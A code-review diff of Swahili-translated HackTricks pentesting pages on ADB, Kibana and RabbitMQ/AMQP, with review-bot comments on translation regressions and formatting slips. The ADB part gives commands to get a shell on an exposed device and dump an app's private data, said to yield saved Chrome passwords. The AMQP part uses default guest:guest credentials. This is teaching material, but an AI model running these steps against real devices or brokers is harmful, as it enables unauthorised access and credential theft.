Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Kutoka [nyaraka](https://developer.android.com/studio/command-line/adb):
From [the docs](https://developer.android.com/studio/command-line/adb):
**Android Debug Bridge** (adb) ni zana ya amri yenye uwezo ambayo inakuwezesha kuwasiliana na kifaa. Amri ya adb inawezesha aina mbalimbali za vitendo vya kifaa, kama vile **kusanikisha na kudukua programu**, na inatoa **upatikanaji wa kabati la Unix** ambalo unaweza kutumia kutekeleza aina mbalimbali za amri kwenye kifaa.
**Android Debug Bridge** (adb) ni zana ya amri ya mstari wa amri inayoweza kutumika kuwasiliana na kifaa. Amri ya adb inarahisisha vitendo mbalimbali vya kifaa, kama vile **kusanidi na kutatua matatizo ya programu**, na inatoa **ufikiaji wa shell ya Unix** ambayo unaweza kutumia kuendesha amri mbalimbali kwenye kifaa.
**Bandari ya chaguo**: 5555.
**Port ya kawaida**: 5555.
```
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
```
## Unganisha
## Connect
Ikiwa utapata huduma ya ADB ikifanya kazi kwenye bandari ya kifaa na unaweza kuunganisha, **unaweza kupata kikao ndani ya mfumo:**
Ikiwa unapata huduma ya ADB ikifanya kazi kwenye bandari ya kifaa na unaweza kuungana nayo, **unaweza kupata shell ndani ya mfumo:**
```bash
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
```
Kwa amri zaidi za ADB angalia ukurasa ufuatao:
Kwa maelezo zaidi ya amri za ADB angalia ukurasa ufuatao:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %}
[adb-commands.md](../mobile-pentesting/android-app-pentesting/adb-commands.md)
{% endcontent-ref %}
### Pata data ya programu
### Punguza data ya programu
Ili kupakua kabisa data ya programu, unaweza:
Ili kupakua kabisa data ya programu unaweza:
```bash
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
```
Unaweza kutumia mbinu hii ku **kupata taarifa nyeti kama nywila za Chrome**. Kwa maelezo zaidi kuhusu hili angalia habari na marejeo yaliyotolewa [**hapa**](https://github.com/carlospolop/hacktricks/issues/274).
You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274).
## Shodan
* `android debug bridge`
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
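Review bot: Several replacement lines in this hunk swap Swahili for English (`## Basic Information`, `From [the docs](...)`, `## Connect`, `You can use this trick to ...`), so the translated page regresses; the English sentence also keeps the upstream typo `the information a references` (should be `and references`). `### Punguza data ya programu` mistranslates the section title: `punguza` means reduce, whereas the section dumps application data, so the old `### Pata data ya programu` is the better heading. In the code block, an explanatory note is glued onto the command line `cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data ...`; pasting that block hands the note's words to `cp` as extra arguments and the copy fails. Move the note to a `#` comment line above the command (the defect is in both old and new versions, so fix it while touching the file).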

View file

@ -1,53 +1,55 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Kibana inajulikana kwa uwezo wake wa kutafuta na kuonyesha data ndani ya Elasticsearch, kawaida ikifanya kazi kwenye bandari **5601**. Inatumika kama kiolesura cha kikundi cha Elastic Stack kwa kazi za ufuatiliaji, usimamizi, na usalama.
Kibana inajulikana kwa uwezo wake wa kutafuta na kuonyesha data ndani ya Elasticsearch, kwa kawaida ikikimbia kwenye bandari **5601**. Inatumika kama kiolesura cha ufuatiliaji, usimamizi, na kazi za usalama za klasta ya Elastic Stack.
## Kuelewa Uthibitishaji
## Understanding Authentication
Mchakato wa uthibitishaji katika Kibana unahusishwa kwa asili na **vitambulisho vinavyotumiwa katika Elasticsearch**. Ikiwa Elasticsearch ina uthibitishaji uliowezeshwa, Kibana inaweza kupatikana bila vitambulisho vyovyote. Kwa upande mwingine, ikiwa Elasticsearch imehifadhiwa na vitambulisho, vitambulisho sawa vinahitajika kupata Kibana, ikidumisha ruhusa sawa za mtumiaji kwenye jukwaa zote mbili. Vitambulisho vinaweza kupatikana katika faili ya **/etc/kibana/kibana.yml**. Ikiwa vitambulisho hivi havihusiani na mtumiaji wa **kibana_system**, vinaweza kutoa haki za ufikiaji zaidi, kwani ufikiaji wa mtumiaji wa kibana_system umepunguzwa kwa APIs za ufuatiliaji na indeksi ya .kibana.
Mchakato wa uthibitishaji katika Kibana unahusiana kwa karibu na **vithibitisho vinavyotumika katika Elasticsearch**. Ikiwa Elasticsearch haina uthibitishaji, Kibana inaweza kufikiwa bila vithibitisho vyovyote. Kinyume chake, ikiwa Elasticsearch imeimarishwa kwa vithibitisho, vithibitisho hivyo hivyo vinahitajika kufikia Kibana, ikihifadhi ruhusa sawa za mtumiaji katika majukwaa yote mawili. Vithibitisho vinaweza kupatikana katika faili **/etc/kibana/kibana.yml**. Ikiwa vithibitisho hivi havihusiani na mtumiaji **kibana_system**, vinaweza kutoa haki pana za ufikiaji, kwani ufikiaji wa mtumiaji kibana_system umepunguziliwa kwa API za ufuatiliaji na index ya .kibana.
## Hatua Baada ya Kupata Ufikiaji
## Actions Upon Access
Marafiki kupata Kibana, hatua kadhaa zinashauriwa:
Mara tu ufikiaji wa Kibana unavyokuwa salama, hatua kadhaa zinashauriwa:
- Kuchunguza data kutoka Elasticsearch inapaswa kuwa kipaumbele.
- Uwezo wa kusimamia watumiaji, ikiwa ni pamoja na kuhariri, kufuta, au kuunda watumiaji, majukumu, au funguo za API mpya, unapatikana chini ya Usimamizi wa Kundi -> Watumiaji/Majukumu/Funguo za API.
- Ni muhimu kuangalia toleo lililowekwa la Kibana kwa kasoro zinazojulikana, kama vile kasoro ya RCE iliyojulikana katika toleo kabla ya 6.6.0 ([Maelezo Zaidi](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)).
- Uwezo wa kusimamia watumiaji, ikiwa ni pamoja na kuhariri, kufuta, au kuunda watumiaji wapya, majukumu, au funguo za API, unapatikana chini ya Usimamizi wa Stack -> Watumiaji/Majukumu/Funguo za API.
- Ni muhimu kuangalia toleo lililowekwa la Kibana kwa udhaifu unaojulikana, kama vile udhaifu wa RCE ulioainishwa katika matoleo kabla ya 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)).
## Uzingatiaji wa SSL/TLS
## SSL/TLS Considerations
Katika hali ambapo SSL/TLS haijaanzishwa, uwezekano wa kuvuja kwa habari nyeti unapaswa kuchunguzwa kwa kina.
Katika hali ambapo SSL/TLS haijawashwa, uwezekano wa kuvuja kwa taarifa nyeti unapaswa kutathminiwa kwa kina.
## Marejeo
## References
* [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
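Review bot: The new headings `# Basic Information`, `## Understanding Authentication`, `## Actions Upon Access`, `## SSL/TLS Considerations` and `## References` are English in an otherwise Swahili page; keep `# Taarifa Msingi`, `## Kuelewa Uthibitishaji` and the other Swahili headings from the old lines. The body change, on the other hand, should stay: the old sentence `Ikiwa Elasticsearch ina uthibitishaji uliowezeshwa, Kibana inaweza kupatikana bila vitambulisho vyovyote` inverted the condition (it said Kibana is reachable without credentials when Elasticsearch has authentication enabled), and the new `Ikiwa Elasticsearch haina uthibitishaji, Kibana inaweza kufikiwa bila vithibitisho vyovyote` states the intended meaning. The old `Marafiki kupata Kibana` was a garbled opener; the new `Mara tu ufikiaji wa Kibana unavyokuwa salama` reads fine.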

View file

@ -1,33 +1,36 @@
# 5671,5672 - Pentesting AMQP
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Kutoka [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html):
From [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html):
> **RabbitMQ** ni **programu ya foleni ya ujumbe** inayojulikana pia kama _message broker_ au _queue manager_. Kwa ufupi, ni programu ambapo foleni zinatengenezwa, ambapo programu zinahusiana ili kuhamisha ujumbe au ujumbe.\
> Ujumbe unaweza kuwa na aina yoyote ya habari. Inaweza, kwa mfano, kuwa na habari kuhusu mchakato au kazi ambayo inapaswa kuanza kwenye programu nyingine (ambayo inaweza hata kuwa kwenye seva nyingine), au inaweza kuwa ujumbe wa maandishi tu. Programu ya queue-manager inahifadhi ujumbe hadi programu ya kupokea inapounganisha na kuchukua ujumbe kutoka kwenye foleni. Programu ya kupokea kisha inaprocess ujumbe.\
> **RabbitMQ** ni **programu ya kupanga ujumbe** inayojulikana pia kama _mwakilishi wa ujumbe_ au _msimamizi wa foleni._ Kwa ufupi; ni programu ambapo foleni zinafafanuliwa, ambazo programu zinajiunga ili kuhamasisha ujumbe au ujumbe.\
> Ujumbe **unaweza kujumuisha aina yoyote ya habari**. Inaweza, kwa mfano, kuwa na habari kuhusu mchakato au kazi ambayo inapaswa kuanza kwenye programu nyingine (ambayo inaweza hata kuwa kwenye seva nyingine), au inaweza kuwa ujumbe rahisi wa maandiko. Programu ya msimamizi wa foleni inahifadhi ujumbe hadi programu inayopokea inajiunga na kuchukua ujumbe kutoka kwenye foleni. Programu inayopokea kisha inashughulikia ujumbe huo.\
Definition from .
**Default port**: 5672,5671
```
PORT STATE SERVICE VERSION
5672/tcp open amqp RabbitMQ 3.1.5 (0-9)
```
## Uchambuzi
## Enumeration
### Kwa Mkono
### Manual
```python
import amqp
#By default it uses default credentials "guest":"guest"
@ -37,20 +40,6 @@ for k, v in conn.server_properties.items():
print(k, v)
```
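Review bot: `Definition from .` is a dangling line with nothing after `from`; either restore the source it was meant to carry or drop the line, since the quote is already attributed to cloudamqp two lines earlier. The new `## Basic Information`, `## Enumeration`, `### Manual` and `From [cloudamqp](...)` are English in a Swahili page while the old `## Taarifa Msingi`, `## Uchambuzi`, `### Kwa Mkono` were already translated; keep those. In the quoted RabbitMQ definition the new text translates `message broker` and `queue manager` to `mwakilishi wa ujumbe` / `msimamizi wa foleni`; the old text kept them in English, which is how the terms appear in RabbitMQ's own documentation, so prefer the English terms, with a Swahili gloss if wanted.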
### Kiotomatiki
AMQP (Advanced Message Queuing Protocol) ni itifaki ya mawasiliano ambayo hutumiwa kwa ajili ya kuwasiliana na mifumo ya ujumbe. Inaruhusu programu mbalimbali kubadilishana ujumbe kwa njia ya njia ya ujumbe. Kwa mfano, inaweza kutumika kwa ajili ya kuwasiliana kati ya seva na wateja, au kati ya seva mbili.
Katika mchakato wa pentesting, ni muhimu kuelewa jinsi AMQP inavyofanya kazi na jinsi inavyoweza kudukuliwa. Hii inaweza kusaidia kugundua udhaifu na kuchukua hatua za kiusalama zinazofaa.
Kuna njia kadhaa za kiotomatiki za kufanya pentesting kwenye itifaki ya AMQP. Hapa kuna baadhi ya zana maarufu:
- **RabbitMQ-CLI**: Hii ni zana ya amri ya mstari wa amri ambayo inaruhusu kufanya operesheni mbalimbali kwenye seva ya RabbitMQ. Inaweza kutumika kwa ajili ya kuchunguza mazingira ya RabbitMQ na kufanya majaribio ya kudukua.
- **AMQP-Client**: Hii ni maktaba ya Python ambayo inaruhusu kuunda wateja wa AMQP na kufanya operesheni mbalimbali kama kutuma na kupokea ujumbe. Inaweza kutumika kwa ajili ya kujenga skana za kiotomatiki na kufanya majaribio ya kudukua.
- **Metasploit**: Hii ni jukwaa la usalama ambalo linatoa zana mbalimbali za kudukua. Ina moduli kadhaa zinazohusiana na AMQP, ambazo zinaweza kutumika kwa ajili ya kufanya majaribio ya kudukua kwenye mifumo ya AMQP.
Kwa kutumia zana hizi za kiotomatiki, unaweza kufanya pentesting kwenye mifumo ya AMQP kwa njia ya haraka na yenye ufanisi. Hii inaweza kusaidia kugundua udhaifu na kuchukua hatua za kiusalama zinazofaa ili kulinda mifumo yako dhidi ya mashambulizi.
```bash
nmap -sV -Pn -n -T4 -p 5672 --script amqp-info <IP>
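Review bot: the heading "### Kiotomatiki" appears to remain in Swahili while the sibling headings in this file were changed to "## Enumeration" and "### Manual"; suggest "### Automatic" so the three section titles match. Dropping the seven paragraphs between that heading and the nmap block is the right call: they were generic filler about "RabbitMQ-CLI", "AMQP-Client" and Metasploit that did not describe the enumeration step the nmap command performs.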
@ -72,38 +61,39 @@ PORT STATE SERVICE VERSION
```
### Brute Force
* [**AMQP Itifaki ya Brute-Force**](../generic-methodologies-and-resources/brute-force.md#amqp-activemq-rabbitmq-qpid-joram-and-solace)
* [**STOMP Itifaki ya Brute-Force**](../generic-methodologies-and-resources/brute-force.md#stomp-activemq-rabbitmq-hornetq-and-openmq)
* [**AMQP Protocol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#amqp-activemq-rabbitmq-qpid-joram-and-solace)
* [**STOMP Protocol Brute-Force**](../generic-methodologies-and-resources/brute-force.md#stomp-activemq-rabbitmq-hornetq-and-openmq)
## Bandari Nyingine za RabbitMQ
## Mipangilio Mingine ya RabbitMQ
Katika [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) unaweza kupata kwamba **rabbitmq hutumia bandari kadhaa**:
Katika [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) unaweza kupata kwamba **rabbitmq inatumia mipangilio kadhaa**:
* **1883, 8883**: ([wateja wa MQTT](http://mqtt.org) bila na na TLS, ikiwa [programu-jalizi ya MQTT](https://www.rabbitmq.com/mqtt.html) imeamilishwa. [**Jifunze zaidi kuhusu jinsi ya kufanya pentest MQTT hapa**](1883-pentesting-mqtt-mosquitto.md).
* **4369: epmd**, huduma ya ugunduzi wa rika inayotumiwa na nodi za RabbitMQ na zana za CLI. [**Jifunze zaidi kuhusu jinsi ya kufanya pentest kwenye huduma hii hapa**](4369-pentesting-erlang-port-mapper-daemon-epmd.md).
* **5672, 5671**: hutumiwa na wateja wa AMQP 0-9-1 na 1.0 bila na na TLS
* **15672**: wateja wa [API ya HTTP](https://www.rabbitmq.com/management.html), [UI ya usimamizi](https://www.rabbitmq.com/management.html) na [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) (tu ikiwa [programu-jalizi ya usimamizi](https://www.rabbitmq.com/management.html) imeamilishwa). [**Jifunze zaidi kuhusu jinsi ya kufanya pentest kwenye huduma hii hapa**](15672-pentesting-rabbitmq-management.md).
* 15674: wateja wa STOMP-over-WebSockets (tu ikiwa [programu-jalizi ya Web STOMP](https://www.rabbitmq.com/web-stomp.html) imeamilishwa)
* 15675: wateja wa MQTT-over-WebSockets (tu ikiwa [programu-jalizi ya Web MQTT](https://www.rabbitmq.com/web-mqtt.html) imeamilishwa)
* 15692: takwimu za Prometheus (tu ikiwa [programu-jalizi ya Prometheus](https://www.rabbitmq.com/prometheus.html) imeamilishwa)
* 25672: hutumiwa kwa mawasiliano kati ya nodi na zana za CLI (bandari ya seva ya usambazaji ya Erlang) na imepangiwa kutoka kwa safu ya kipekee (imezuiliwa kwa bandari moja tu kwa chaguo-msingi, inahesabiwa kama bandari ya AMQP + 20000). Isipokuwa mawasiliano ya nje kwenye bandari hizi ni muhimu sana (kwa mfano, kikundi kinatumia [federation](https://www.rabbitmq.com/federation.html) au zana za CLI zinatumika kwenye mashine zilizo nje ya subnet), bandari hizi hazipaswi kuwa wazi kwa umma. Angalia [mwongozo wa mtandao](https://www.rabbitmq.com/networking.html) kwa maelezo zaidi. **Ni bandari 9 tu kati ya hizi zilizofunguliwa kwenye mtandao**.
* 35672-35682: hutumiwa na zana za CLI (bandari za wateja wa usambazaji wa Erlang) kwa mawasiliano na nodi na imepangiwa kutoka kwa safu ya kipekee (imehesabiwa kama bandari ya usambazaji ya seva + 10000 hadi bandari ya usambazaji ya seva + 10010). Angalia [mwongozo wa mtandao](https://www.rabbitmq.com/networking.html) kwa maelezo zaidi.
* 61613, 61614: [wateja wa STOMP](https://stomp.github.io/stomp-specification-1.2.html) bila na na TLS (tu ikiwa [programu-jalizi ya STOMP](https://www.rabbitmq.com/stomp.html) imeamilishwa). Chini ya vifaa 10 na bandari hii wazi na kwa kawaida UDP kwa nodi za DHT.
* **1883, 8883**: ([Wateja wa MQTT](http://mqtt.org) bila na na TLS, ikiwa [plugin ya MQTT](https://www.rabbitmq.com/mqtt.html) imewezeshwa. [**Jifunze zaidi kuhusu jinsi ya pentest MQTT hapa**](1883-pentesting-mqtt-mosquitto.md).
* **4369: epmd**, huduma ya kugundua wenzake inayotumiwa na nodi za RabbitMQ na zana za CLI. [**Jifunze zaidi kuhusu jinsi ya pentest huduma hii hapa**](4369-pentesting-erlang-port-mapper-daemon-epmd.md).
* **5672, 5671**: inatumika na wateja wa AMQP 0-9-1 na 1.0 bila na na TLS
* **15672**: [HTTP API](https://www.rabbitmq.com/management.html) wateja, [UI ya usimamizi](https://www.rabbitmq.com/management.html) na [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) (tu ikiwa [plugin ya usimamizi](https://www.rabbitmq.com/management.html) imewezeshwa). [**Jifunze zaidi kuhusu jinsi ya pentest huduma hii hapa**](15672-pentesting-rabbitmq-management.md).
* 15674: wateja wa STOMP-over-WebSockets (tu ikiwa [plugin ya Web STOMP](https://www.rabbitmq.com/web-stomp.html) imewezeshwa)
* 15675: wateja wa MQTT-over-WebSockets (tu ikiwa [plugin ya Web MQTT](https://www.rabbitmq.com/web-mqtt.html) imewezeshwa)
* 15692: metriki za Prometheus (tu ikiwa [plugin ya Prometheus](https://www.rabbitmq.com/prometheus.html) imewezeshwa)
* 25672: inatumika kwa mawasiliano kati ya nodi na zana za CLI (bandari ya seva ya usambazaji ya Erlang) na inatengwa kutoka kwa anuwai ya dinamik (imepangwa kwa bandari moja kwa chaguo-msingi, inakokotwa kama bandari ya AMQP + 20000). Iwapo muunganisho wa nje kwenye mipangilio hii ni muhimu sana (kwa mfano, klasta inatumia [federation](https://www.rabbitmq.com/federation.html) au zana za CLI zinatumika kwenye mashine nje ya subnet), mipangilio hii haipaswi kufichuliwa hadharani. Tazama [mwongozo wa mtandao](https://www.rabbitmq.com/networking.html) kwa maelezo. **Ni mipangilio 9 tu kati ya hizi iliyo wazi kwenye mtandao**.
* 35672-35682: inatumika na zana za CLI (bandari za mteja wa usambazaji wa Erlang) kwa mawasiliano na nodi na inatengwa kutoka kwa anuwai ya dinamik (inakatwa kama bandari ya usambazaji wa seva + 10000 kupitia bandari ya usambazaji wa seva + 10010). Tazama [mwongozo wa mtandao](https://www.rabbitmq.com/networking.html) kwa maelezo.
* 61613, 61614: [wateja wa STOMP](https://stomp.github.io/stomp-specification-1.2.html) bila na na TLS (tu ikiwa [plugin ya STOMP](https://www.rabbitmq.com/stomp.html) imewezeshwa). Chini ya vifaa 10 vyenye bandari hii wazi na hasa UDP kwa nodi za DHT.
## Shodan
* `AMQP`
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
